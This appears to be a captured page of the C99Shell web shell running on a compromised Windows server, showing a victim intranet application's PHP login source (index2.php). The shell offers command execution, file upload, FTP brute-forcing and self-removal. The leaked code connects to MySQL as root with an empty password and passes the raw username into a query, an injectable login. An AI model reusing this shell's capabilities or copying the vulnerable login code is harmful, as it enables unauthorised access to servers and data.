!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\PEV\   drwxrwxrwx
Free 4.1 GB of 39.52 GB (10.37%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index2.php (4.02 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
    // Configura los datos de tu cuenta
    $dbhost='127.0.0.1';
    $dbusername='root';
    $dbuserpass='';
    $dbname='pev';

    session_start(); 
    
    if($entrar){
    // Conectar a la base de datos
    mysql_connect ($dbhost, $dbusername, $dbuserpass);
    mysql_select_db($dbname) or die('Cannot select database');

    if ($_POST['username']) {
    //Comprobacion del envio del nombre de usuario y password
    $username=$_POST['username'];
    $password=$_POST['password'];
    if ($password==NULL) {
    
    echo '<script languaje="JavaScript">
   //       self.close()  
    alert("Falto digitar la contraseņa");
    
    document.location.href="index.php";
           
 
</script>';
    
    }else{
    $query = mysql_query("SELECT username,password FROM users WHERE username = '$username'") or die(mysql_error());
    $data = mysql_fetch_array($query);
    if($data['password'] != $password) {
    //echo "Login incorrecto";
     echo '<script languaje="JavaScript">
   //       self.close()  
    alert("Login incorrecto");
    
    document.location.href="index.php";
           
 
</script>';
    
    
    }else{
    $query = mysql_query("SELECT username,password,area FROM users WHERE username = '$username'") or die(mysql_error());
    $row = mysql_fetch_array($query);
    $_SESSION["s_username"] = $row['username'];
    $_SESSION["s_area"] = $row['area'];
//    echo "Has sido logueado correctamente ".$_SESSION['s_area']." y puedes acceder al acceso.php. ";
       
       //$s_area= ".$_SESSION['s_area'].";
       $s_area= $row['area'];
       
       if ($s_area == 'legal')
       {   
       $link ="dla.php";
       } 
       if ($s_area == 'tecnica')
       {
       $link ="tecnica.php";
       } 
       if ($s_area == 'notificaciones')
       {
       $link ="notificaciones.php";
       }     
        
        echo "<div align='center'><img src='imagenes/cargando1.gif'> </div>";
    echo '<script LANGUAGE="JavaScript">
var pagina="http://127.0.0.1/pev/'.$link.'"
function redireccionar()
{

document.location.href= pagina
}
setTimeout ("redireccionar()", 3000);
</script>';
    }
    }
    }

  
    }

    
    
    ?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Acceso</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
@import url("miraflores.css");
-->
</style>
<link href="css/jctribin.css" rel="stylesheet" type="text/css">
</head>

<body>
<form action='index.php' method='POST'>
  <table width="650" height="350" align="center" background="imagenes/userid_bg.gif" style='border:1px solid #000000;'>
    <tr>
      <td width="865" align='right'> <p>&nbsp;</p>
        <p>&nbsp;</p>
        <p>&nbsp;</p>
        <p>
          <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="370" height="300">
            <param name="movie" value="flash/pev.swf">
            <param name="quality" value="high">
            <embed src="flash/pev.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="370" height="300"></embed></object>
        </p>
        <p>&nbsp;</p>
        <p>&nbsp;</p>
        <p>&nbsp;</p>
        <p><font face="Broadway">Usuario</font> 
          <input type='text' size='15' maxlength='25' name='username' class="textohome">
        </p></td>
</tr>
<tr>
      <td align='right'> <font face="Broadway">Clave</font> 
        <input type='password' size='15' maxlength='25' name='password' class="textohome">
</td>
</tr>
<tr>
<td align='right'>
<input name="entrar" type="submit" id="entrar" value="Entrar">
</td>
</tr>
<? 
if($confirm == '1')
{
echo "
<tr>
      <td align='center'> <p>&nbsp;</p>
        <p>&nbsp;</p>
        <p>&nbsp;</p>
        <p>&nbsp;</p>
        <p>&nbsp;</p>
        <p>&nbsp;</p>
        <p>&nbsp;</p>
        <p>&nbsp;</p>
        <p>&nbsp;</p></td>
</tr>"; 
}
?> 
</table>
</form>

</body>

</html>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--